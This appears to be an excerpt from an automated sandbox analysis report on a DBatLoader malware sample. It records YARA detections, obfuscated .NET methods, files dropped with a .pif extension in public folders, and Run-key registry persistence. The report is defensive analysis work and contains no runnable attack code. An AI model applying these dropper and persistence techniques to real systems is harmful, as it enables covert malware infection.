            Source: C:\Users\Public\Libraries\yihfsboC.pifUnpacked PE file: 14.2.yihfsboC.pif.400000.5.unpack
            Source: C:\Users\Public\Libraries\yihfsboC.pifUnpacked PE file: 23.2.yihfsboC.pif.400000.1.unpack
            Source: C:\Users\Public\Libraries\yihfsboC.pifUnpacked PE file: 26.2.yihfsboC.pif.400000.0.unpack
            Yara detected DBatLoader
            Source: Yara matchFile source: 0.2.EPTMAcgvNZ.exe.2b10000.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.EPTMAcgvNZ.exe.23265a8.1.unpack, type: UNPACKEDPE
            .NET source code contains method to dynamically call methods (often used by packers)
            Source: 14.2.yihfsboC.pif.27066478.12.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
            Source: 14.2.yihfsboC.pif.285a0f08.13.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
            Source: 14.2.yihfsboC.pif.25d6c896.9.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
            Source: 14.2.yihfsboC.pif.28be0000.15.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
            Source: 14.3.yihfsboC.pif.24219998.0.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
            Source: 14.2.yihfsboC.pif.2709e790.10.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
            Source: yihfsboC.pif.0.drStatic PE information: 0x9E9038DB [Sun Apr 19 22:51:07 2054 UTC]
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeCode function: 0_2_02B2894C LoadLibraryW,GetProcAddress,FreeLibrary,0_2_02B2894C
            Source: alpha.pif.11.drStatic PE information: section name: .didat
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeCode function: 0_2_02B3D2FC push 02B3D367h; ret 0_2_02B3D35F
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeCode function: 0_2_02B163B0 push 02B1640Bh; ret 0_2_02B16403
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeCode function: 0_2_02B163AE push 02B1640Bh; ret 0_2_02B16403
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeCode function: 0_2_02B1332C push eax; ret 0_2_02B13368
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeCode function: 0_2_02B3C378 push 02B3C56Eh; ret 0_2_02B3C566
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeCode function: 0_2_02B1C349 push 8B02B1C1h; ret 0_2_02B1C34E
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeCode function: 0_2_02B3D0AC push 02B3D125h; ret 0_2_02B3D11D
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeCode function: 0_2_02B2306B push 02B230B9h; ret 0_2_02B230B1
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeCode function: 0_2_02B2306C push 02B230B9h; ret 0_2_02B230B1
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeCode function: 0_2_02B3D1F8 push 02B3D288h; ret 0_2_02B3D280
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeCode function: 0_2_02B2F108 push ecx; mov dword ptr [esp], edx0_2_02B2F10D
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeCode function: 0_2_02B3D144 push 02B3D1ECh; ret 0_2_02B3D1E4
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeCode function: 0_2_02B16782 push 02B167C6h; ret 0_2_02B167BE
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeCode function: 0_2_02B16784 push 02B167C6h; ret 0_2_02B167BE
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeCode function: 0_2_02B1D5A0 push 02B1D5CCh; ret 0_2_02B1D5C4
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeCode function: 0_2_02B3C570 push 02B3C56Eh; ret 0_2_02B3C566
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeCode function: 0_2_02B1C56C push ecx; mov dword ptr [esp], edx0_2_02B1C571
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeCode function: 0_2_02B2AAE0 push 02B2AB18h; ret 0_2_02B2AB10
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeCode function: 0_2_02B28AD8 push 02B28B10h; ret 0_2_02B28B08
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeCode function: 0_2_02B2AADF push 02B2AB18h; ret 0_2_02B2AB10
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeCode function: 0_2_02B84A50 push eax; ret 0_2_02B84B20
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeCode function: 0_2_02B1CBEC push 02B1CD72h; ret 0_2_02B1CD6A
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeCode function: 0_2_02B2886C push 02B288AEh; ret 0_2_02B288A6
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeCode function: 0_2_02B1C98E push 02B1CD72h; ret 0_2_02B1CD6A
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeCode function: 0_2_02B2790C push 02B27989h; ret 0_2_02B27981
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeCode function: 0_2_02B26946 push 02B269F3h; ret 0_2_02B269EB
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeCode function: 0_2_02B26948 push 02B269F3h; ret 0_2_02B269EB
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeCode function: 0_2_02B25E7C push ecx; mov dword ptr [esp], edx0_2_02B25E7E
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeCode function: 0_2_02B22F60 push 02B22FD6h; ret 0_2_02B22FCE
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 14_2_0041C40C push cs; iretd 14_2_0041C4E2
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 14_2_00423149 push eax; ret 14_2_00423179
            Source: 14.2.yihfsboC.pif.27066478.12.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'B2O7fKYFnJNBC', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
            Source: 14.2.yihfsboC.pif.285a0f08.13.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'B2O7fKYFnJNBC', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
            Source: 14.2.yihfsboC.pif.25d6c896.9.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'B2O7fKYFnJNBC', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
            Source: 14.2.yihfsboC.pif.28be0000.15.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'B2O7fKYFnJNBC', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
            Source: 14.3.yihfsboC.pif.24219998.0.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'B2O7fKYFnJNBC', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
            Source: 14.2.yihfsboC.pif.2709e790.10.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'B2O7fKYFnJNBC', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'

            Persistence and Installation Behavior

            barindex
            Drops PE files with a suspicious file extension
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeFile created: C:\Users\Public\Libraries\yihfsboC.pifJump to dropped file
            Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
            Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\Libraries\Cobsfhiy.PIFJump to dropped file
            Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\xpha.pifJump to dropped file
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeFile created: C:\Users\Public\Libraries\yihfsboC.pifJump to dropped file
            Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
            Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\Libraries\Cobsfhiy.PIFJump to dropped file
            Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\xpha.pifJump to dropped file
            Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
            Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\xpha.pifJump to dropped file

            Boot Survival

            barindex
            Drops PE files to the user root directory
            Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
            Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\xpha.pifJump to dropped file
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run CobsfhiyJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run CobsfhiyJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeCode function: 0_2_02B2AB1C GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_02B2AB1C
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\Cobsfhiy.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\Cobsfhiy.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifMemory allocated: 24170000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifMemory allocated: 26060000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifMemory allocated: 25E10000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifMemory allocated: 343D0000 memory reserve | memory write watch
            Source: C:\Users\Public\Libraries\yihfsboC.pifMemory allocated: 34950000 memory reserve | memory write watch
            Source: C:\Users\Public\Libraries\yihfsboC.pifMemory allocated: 345F0000 memory reserve | memory write watch
            Source: C:\Users\Public\Libraries\yihfsboC.pifMemory allocated: 28410000 memory reserve | memory write watch
